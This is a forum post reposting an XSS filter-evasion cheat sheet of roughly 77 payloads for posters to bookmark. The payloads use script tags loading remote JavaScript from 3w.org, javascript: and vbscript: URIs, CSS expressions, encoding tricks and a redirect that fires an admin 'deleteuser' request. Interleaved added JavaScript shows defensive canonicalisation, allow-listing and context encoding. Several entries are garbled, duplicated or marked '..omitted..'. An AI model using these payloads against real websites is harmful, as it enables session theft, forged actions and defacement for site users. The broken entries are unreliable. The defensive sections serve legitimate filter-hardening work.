There doesn't seem to be much XSS material on t00ls, so I copied over something good I came across; not sure whether any of you need to bookmark it.

(1) Ordinary XSS JavaScript injection
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
(2) IMG tag XSS using a JavaScript directive
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
(3) IMG tag, no semicolon and no quotes
<IMG SRC=javascript:alert('XSS')>
(4) IMG tag, case-insensitive
<IMG SRC=JaVaScRiPt:alert('XSS')>
(5) HTML entity encoding (semicolons required)
<IMG SRC=javascript:alert("XSS")>
(6) Malformed IMG tag
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">
(7) String.fromCharCode (calculator)
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
(8) UTF-8 Unicode encoding (calculator)
<IMG SRC=jav..omitted..S')>
(9) Long (7-digit) UTF-8 Unicode encoding without semicolons (calculator)
<IMG SRC=jav..omitted..S')>
(10) Hex encoding, also without semicolons (calculator)
<IMG SRC=java..omitted..XSS')>
(11) Embedded tab to split up the JavaScript
<IMG SRC="jav ascript:alert('XSS');">
(12) Embedded encoded tab to split up the JavaScript
<IMG SRC="jav ascript:alert('XSS');">
(13) Embedded newline
<IMG SRC="jav ascript:alert('XSS');">
(14) Embedded carriage return
<IMG SRC="jav ascript:alert('XSS');">
(15) Multiline injected JavaScript, an extreme XSS example
<IMG SRC="javascript:alert('XSS')">
(16) Working around a character limit (all fragments must be on the same page)
<script>z='document.'</script>
<script>z=z+'write("'</script>
<script>z=z+'<script'</script>
<script>z=z+' src=ht'</script>
<script>z=z+'tp://ww'</script>
<script>z=z+'w.shell'</script>
<script>z=z+'.net/1.'</script>
<script>z=z+'js></sc'</script>
<script>z=z+'ript>")'</script>
<script>eval(z)</script>
12-7-1 T00LS - Powered by Discuz! Board
https://www.t00ls.net/viewthread ... table&tid=15267 2/6
(17) Null character
perl -e 'print "<IMG SRC=java\0script:alert(\"XSS\")>";' > out
(18) Null character 2 (null characters are basically useless domestically, since there is nowhere they can be exploited)
perl -e 'print "<SCR\0IPT>alert(\"XSS\")</SCR\0IPT>";' > out
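Items (3) through (18) all target the same weak filter: a literal match on the string "javascript:". They vary case, spell the scheme as HTML character references (with and without the trailing semicolon), and interleave tab, newline, carriage return and NUL characters that the browser discards before it interprets the scheme. The JavaScript below is an added example, not code from the original post or from the cheat sheet it copies; it shows the defender's answer, which is to canonicalise the attribute value the way the browser will and then apply an allow list of schemes instead of a deny list. The function names (decodeHtmlEntities, canonicaliseUrl, naiveDenyList, isSafeUrlAttribute) and the sample inputs are constructed for this example.

```javascript
// Added example (not part of the original post or of the cheat sheet it copies).
// All function names here are assumptions of this example, not a library API.

// Decode numeric HTML character references (&#106; &#x6A; and the semicolon-less
// forms that lenient parsers accept), because the browser decodes them before
// it ever looks at the URL scheme (items 5, 8, 9, 10).
function decodeHtmlEntities(s) {
  return s.replace(/&#(x[0-9a-f]+|[0-9]+);?/gi, (match, code) => {
    const isHex = code[0].toLowerCase() === 'x';
    const cp = isHex ? parseInt(code.slice(1), 16) : parseInt(code, 10);
    return cp <= 0x10ffff ? String.fromCodePoint(cp) : match;
  });
}

// Canonicalise the attribute value the way the browser effectively does:
// decode entities, drop NUL bytes and the tab/newline/carriage-return and
// leading-space characters that are ignored inside a scheme (items 11-14, 17-19),
// then fold case (item 4).
function canonicaliseUrl(raw) {
  return decodeHtmlEntities(raw)
    .replace(/[\x00-\x20\x7f]/g, '')
    .toLowerCase();
}

// The kind of deny-list filter the cheat sheet is written to defeat: a literal
// substring match on the raw value.
function naiveDenyList(raw) {
  return !raw.includes('javascript:');
}

// Allow-list check on the canonical form: a value is accepted only if it has no
// scheme at all (a relative URL) or a scheme from the allow list. Everything
// else, including every spelling of javascript:, vbscript: or data:, is rejected.
const ALLOWED_SCHEMES = ['http', 'https', 'mailto'];

function isSafeUrlAttribute(raw) {
  const url = canonicaliseUrl(raw);
  const m = url.match(/^([a-z][a-z0-9+.\-]*):/);
  if (m === null) return true;            // relative URL: no scheme present
  return ALLOWED_SCHEMES.includes(m[1]);
}

// Constructed sample inputs modelled on items 3-19 (not taken verbatim from the page).
const SAMPLES = [
  "javascript:alert('XSS')",                                                      // item 3
  "JaVaScRiPt:alert('XSS')",                                                      // item 4
  "&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;alert('XSS')",  // item 5
  "&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29", // item 10
  "jav\tascript:alert('XSS');",                                                   // item 11
  "jav&#x0A;ascript:alert('XSS');",                                               // item 13
  "java\u0000script:alert('XSS')",                                                // item 17
  " javascript:alert('XSS');",                                                    // item 19
  "http://example.invalid/a.png",
  "/images/a.png",
];

for (const s of SAMPLES) {
  console.log(JSON.stringify(s), 'deny-list passes:', naiveDenyList(s), 'allow-list passes:', isSafeUrlAttribute(s));
}
```

Run under Node and the deny list passes most of the encoded and case-varied samples while the allow list rejects every one of them and accepts only the http and relative URLs. The check answers only the scheme question; the value still has to be attribute-encoded when it is written into the HTML, and a remote http script source (items 1 and 24) is a separate policy decision.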
(19) IMG tag with spaces and meta characters before the JavaScript
<IMG SRC=" javascript:alert('XSS');">
(20) Non-alpha-non-digit XSS
<SCRIPT/XSS SRC="http://3w.org/XSS/xss.js"></SCRIPT>
(21) Non-alpha-non-digit XSS, variant 2
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>
(22) Non-alpha-non-digit XSS, variant 3
<SCRIPT/SRC="http://3w.org/XSS/xss.js"></SCRIPT>
(23) Double open brackets
<<SCRIPT>alert("XSS");//<</SCRIPT>
(24) No closing script tag (Firefox and a few other browsers only)
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>
(25) No closing script tag, variant 2
<SCRIPT SRC=//3w.org/XSS/xss.js>
(26) Half-open HTML/JavaScript XSS
<IMG SRC="javascript:alert('XSS')"
(27) Double open angle brackets
<iframe src=http://3w.org/XSS.html <
(28) No single quotes, double quotes or semicolons
<SCRIPT>a=/XSS/
alert(a.source)</SCRIPT>
(29) Escaping JavaScript escapes
\";alert('XSS');//
(30) Closing TITLE tag
</TITLE><SCRIPT>alert("XSS");</SCRIPT>
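Items (23) through (30) are about breaking out of the context the application placed the data in: (29) supplies a backslash so that an escaper which only prefixes quotes with a backslash ends up producing an escaped backslash followed by a live quote, and (30) closes a TITLE element so that a SCRIPT tag following it is parsed as markup. The JavaScript below is an added example, not code from the original post or the cheat sheet it copies; it contrasts a quote-only escaper with an encoder that rewrites every non-alphanumeric character as a \xHH escape, checks with a small lexer whether the resulting string literal survives intact, and adds the HTML text encoding that neutralises (23) and (30). The function names (naiveJsStringEscape, jsStringEncode, htmlEncode, literalStaysClosed, roundTrips) and the sample payload are constructed for this example.

```javascript
// Added example (not part of the original post or of the cheat sheet it copies).
// Function names are assumptions of this example, not a library API.

// The naive approach item (29) defeats: escape only the quote that delimits the
// literal, leaving an attacker-supplied backslash in place ahead of it.
function naiveJsStringEscape(s) {
  return s.replace(/"/g, '\\"');
}

// Encode every character outside [A-Za-z0-9] as a \xHH / \uHHHH escape. The
// output can then contain no bare quote or backslash, and "</script>" becomes
// \x3c\x2fscript\x3e, which the HTML parser does not recognise as a closing tag.
function jsStringEncode(s) {
  let out = '';
  for (const ch of s) {
    const cp = ch.codePointAt(0);
    if (/^[A-Za-z0-9]$/.test(ch)) out += ch;
    else if (cp < 0x100) out += '\\x' + cp.toString(16).padStart(2, '0');
    else if (cp < 0x10000) out += '\\u' + cp.toString(16).padStart(4, '0');
    else out += '\\u{' + cp.toString(16) + '}';
  }
  return out;
}

// Entity-encode the five characters that matter in HTML text and attribute
// context; this is what stops item (30)'s </TITLE><SCRIPT> and item (23)'s
// <<SCRIPT> from being parsed as tags.
function htmlEncode(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;' };
  return s.replace(/[&<>"']/g, ch => map[ch]);
}

// Lex `body` as the inside of a double-quoted JS string literal: a backslash
// consumes the next character, an unescaped double quote ends the literal.
// Returns true only if the literal runs to the end of the body intact.
function literalStaysClosed(body) {
  for (let i = 0; i < body.length; i++) {
    if (body[i] === '\\') { i++; continue; }
    if (body[i] === '"') return false;
  }
  return true;
}

// Show the encoder is lossless: evaluating the literal yields the original input.
function roundTrips(s) {
  return new Function('return "' + jsStringEncode(s) + '";')() === s;
}

// Constructed input modelled on item (29): a backslash followed by a quote.
const PAYLOAD = '\\";alert(\'XSS\');//';

console.log('naive   :', naiveJsStringEscape(PAYLOAD), '| literal intact:', literalStaysClosed(naiveJsStringEscape(PAYLOAD)));
console.log('encoded :', jsStringEncode(PAYLOAD), '| literal intact:', literalStaysClosed(jsStringEncode(PAYLOAD)), '| round-trips:', roundTrips(PAYLOAD));
console.log('html    :', htmlEncode('</TITLE><SCRIPT>alert("XSS");</SCRIPT>'));
```

The naive escaper turns the payload into a literal that ends after the first two characters, with the rest of the input left as a live statement; the \xHH encoder produces a literal that the lexer reports as intact and that evaluates back to the original string. Encoding by context, with a separate encoder for HTML text, HTML attributes and JavaScript string literals, is the general rule these items illustrate.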
(31) INPUT image
<INPUT SRC="javascript:alert('XSS');">
(32) BODY image
<BODY BACKGROUND="javascript:alert('XSS')">
(33) BODY tag
<BODY('XSS')>
(34) IMG Dynsrc
<IMG DYNSRC="javascript:alert('XSS')">
(35) IMG Lowsrc
<IMG LOWSRC="javascript:alert('XSS')">
(36) BGSOUND
<BGSOUND SRC="javascript:alert('XSS');">
(37) STYLE sheet
<LINK REL="stylesheet" HREF="javascript:alert('XSS');">
(38) Remote style sheet
<LINK REL="stylesheet" HREF="http://3w.org/xss.css">
(39) List-style-image
<STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS
(40) IMG VBScript
<IMG SRC='vbscript:msgbox("XSS")'></STYLE><UL><LI>XSS
(41) META link URL
<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">
(42) Iframe
<IFRAME SRC="javascript:alert('XSS');"></IFRAME>
(43) Frame
<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>
(44) Table
<TABLE BACKGROUND="javascript:alert('XSS')">
(45) TD
<TABLE><TD BACKGROUND="javascript:alert('XSS')">
(46) DIV background-image
<DIV STYLE="background-image: url(javascript:alert('XSS'))">
(47) DIV background-image with extra characters appended (1-32&34&39&160&8192-8&13&12288&65279)
<DIV STYLE="background-image: url(javascript:alert('XSS'))">
(48) DIV expression
<DIV STYLE="width: expression(alert('XSS'));">
(49) STYLE attribute with a split-up expression
<IMG STYLE="xss:expression(alert('XSS'))">
(50) Anonymous tag with a STYLE attribute (anything formed from an open angle bracket followed by a letter)
<XSS STYLE="xss:expression(alert('XSS'))">
(51) STYLE background-image
<STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A>
(52) IMG STYLE
exppression(alert("XSS"))'>
(53) STYLE background
<STYLE><STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>
(54) BASE
<BASE HREF="javascript:alert('XSS');//">
(55) EMBED tag: you can embed a Flash movie that carries the XSS
<EMBED SRC="http://3w.org/XSS/xss.swf" ></EMBED>
(56) ActionScript inside the Flash movie can smuggle in your XSS code
a="get";
b="URL(\"";
c="javascript:";
d="alert('XSS');\")";
eval(a+b+c+d);
(57) XML namespace; the .HTC file must sit on the same server as your XSS vector
<HTML xmlns:xss>
<?import namespace="xss" implementation="http://3w.org/XSS/xss.htc">
<xss:xss>XSS</xss:xss>
</HTML>
(58) If your JS is filtered, you can put the JS code inside an image and load it from there
<SCRIPT SRC=""></SCRIPT>
(59) IMG embedded command, which can fire arbitrary commands
<IMG SRC="http://www.XXX.com/a.php?a=b">
(60) IMG embedded command (a.jpg on the same server)
Redirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser
(61) Bypassing symbol filters
<SCRIPT a=">" SRC="http://3w.org/xss.js"></SCRIPT>
(62)
<SCRIPT =">" SRC="http://3w.org/xss.js"></SCRIPT>
(63)
<SCRIPT a=">" " SRC="http://3w.org/xss.js"></SCRIPT>
(64)
<SCRIPT "a='>'" SRC="http://3w.org/xss.js"></SCRIPT>
(65)
<SCRIPT a=`>` SRC="http://3w.org/xss.js"></SCRIPT>
(66)
<SCRIPT a=">'>" SRC="http://3w.org/xss.js"></SCRIPT>
(67)
<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://3w.org/xss.js"></SCRIPT>
(68) URL bypass
<A HREF="http://127.0.0.1/">XSS</A>
(69) URL encoding
<A HREF="http://3w.org">XSS</A>
(70) IP as a decimal integer
<A HREF="http://3232235521">XSS</A>
(71) IP in hexadecimal
<A HREF="http://0xc0.0xa8.0x00.0x01">XSS</A>
(72) IP in octal
<A HREF="http://0300.0250.0000.0001">XSS</A>
(73) Mixed encoding
<A HREF="h
tt p://6 6.000146.0x7.147/">XSS</A>
(74) Omitting [http:]
<A HREF="//www.google.com/">XSS</A>
(75) Omitting [www]
<A HREF="http://google.com/">XSS</A>
(76) Absolute DNS name with a trailing dot
<A HREF="http://www.google.com./">XSS</A>
(77) javascript link
<A HREF="javascript:document.location='http://www.google.com/'">XSS</A>
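Items (70) through (76) respell a host rather than a script: the same IPv4 address written as one decimal integer, as hex or octal components, as a mix of the three with whitespace inside, and a DNS name with a trailing dot, all resolve to the same place, so a host allow list or deny list that compares raw strings can be sidestepped. The JavaScript below is an added example, not code from the original post or the cheat sheet it copies; it reduces a host to one canonical spelling, applying the inet_aton component rules for IPv4 literals, and compares URLs against a host list on that canonical form. The function names (parseIpv4Part, canonicalHost, hostFromUrl, hostMatchesList) are constructed for this example, and IPv6 literals are out of its scope.

```javascript
// Added example (not part of the original post or of the cheat sheet it copies).
// Function names are assumptions of this example; IPv6 literals are out of scope.

// Parse one dotted component the way inet_aton does: 0x prefix = hex,
// leading 0 = octal, otherwise decimal. Returns null if it is not numeric.
function parseIpv4Part(part) {
  if (/^0x[0-9a-f]+$/i.test(part)) return parseInt(part.slice(2), 16);
  if (/^0[0-7]*$/.test(part)) return parseInt(part, 8);
  if (/^[1-9][0-9]*$/.test(part)) return parseInt(part, 10);
  return null;
}

// Reduce a host to one canonical spelling: fold case, drop the trailing dot of
// an absolute DNS name (item 76), remove tab/newline/CR that browsers ignore
// (item 73), and rewrite any decimal/hex/octal/mixed IPv4 literal (items 70-73)
// as a plain dotted quad. Anything that is not an IPv4 literal is returned as a name.
function canonicalHost(host) {
  let h = host.replace(/[\t\n\r]/g, '').toLowerCase();
  if (h.length > 1 && h.endsWith('.')) h = h.slice(0, -1);
  const parts = h.split('.');
  if (parts.length > 4) return h;
  const nums = parts.map(parseIpv4Part);
  if (nums.some(n => n === null)) return h;          // a DNS name, not an IP literal
  // inet_aton semantics: the last component fills all remaining bytes.
  const head = nums.slice(0, -1);
  const last = nums[nums.length - 1];
  const remainingBytes = 4 - head.length;
  if (head.some(n => n > 255) || last >= 256 ** remainingBytes) return h;
  let value = 0;
  for (const n of head) value = value * 256 + n;
  value = value * 256 ** remainingBytes + last;
  return [value >>> 24, (value >>> 16) & 255, (value >>> 8) & 255, value & 255].join('.');
}

// Pull the host out of an absolute or protocol-relative URL (item 74),
// discarding userinfo and port. Returns null for relative URLs.
function hostFromUrl(url) {
  const m = url.replace(/[\t\n\r]/g, '').match(/^(?:[a-z][a-z0-9+.\-]*:)?\/\/([^\/?#]*)/i);
  if (m === null) return null;
  let authority = m[1];
  const at = authority.lastIndexOf('@');
  if (at !== -1) authority = authority.slice(at + 1);
  return authority.replace(/:[0-9]*$/, '');
}

// Compare a URL against a host list on canonical form, so that a list entry such
// as "192.168.0.1" also covers http://3232235521/ and http://0300.0250.0000.0001/.
function hostMatchesList(url, hostList) {
  const host = hostFromUrl(url);
  if (host === null) return false;
  const canon = canonicalHost(host);
  return hostList.some(entry => canonicalHost(entry) === canon);
}

// Constructed inputs modelled on items 70-76.
const URLS = [
  'http://3232235521/',
  'http://0xc0.0xa8.0x00.0x01/',
  'http://0300.0250.0000.0001/',
  'http://6\t6.000146.0x7.147/',
  '//www.google.com/',
  'http://www.google.com./',
];
for (const u of URLS) {
  console.log(u.replace('\t', '\\t'), '=>', canonicalHost(hostFromUrl(u)));
}
```

The first three URLs print as 192.168.0.1 and the fourth as 66.102.7.147, which is what a log search or list lookup should compare against. Environments with a WHATWG URL implementation perform the same IPv4 normalisation in `new URL(u).hostname`; the hand-written parser makes that step visible, and the list comparison is the part that application code usually forgets.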

Original source: http://fuzzexp.org/u/0day/?p=142